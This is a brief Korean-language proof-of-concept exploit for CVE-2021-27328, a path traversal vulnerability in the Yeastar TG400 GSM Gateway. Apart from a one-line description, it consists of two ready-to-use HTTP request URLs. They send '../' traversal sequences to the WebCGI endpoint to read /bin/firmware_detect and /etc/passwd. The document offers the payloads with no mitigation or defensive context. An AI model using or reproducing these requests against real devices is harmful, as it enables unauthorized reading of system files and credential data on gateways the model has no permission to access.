
CVE-2021-27328에 대한 개념 증명 익스플로잇, Yeastar TG400 GSM Gateway의 경로 탐색 취약점으로 WebCGI 엔드포인트에 조작된 HTTP 요청을 통해 임의 파일 읽기를 시연합니다.
이는 CVE-2021-27328에 대한 개념 증명(PoC)입니다.
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
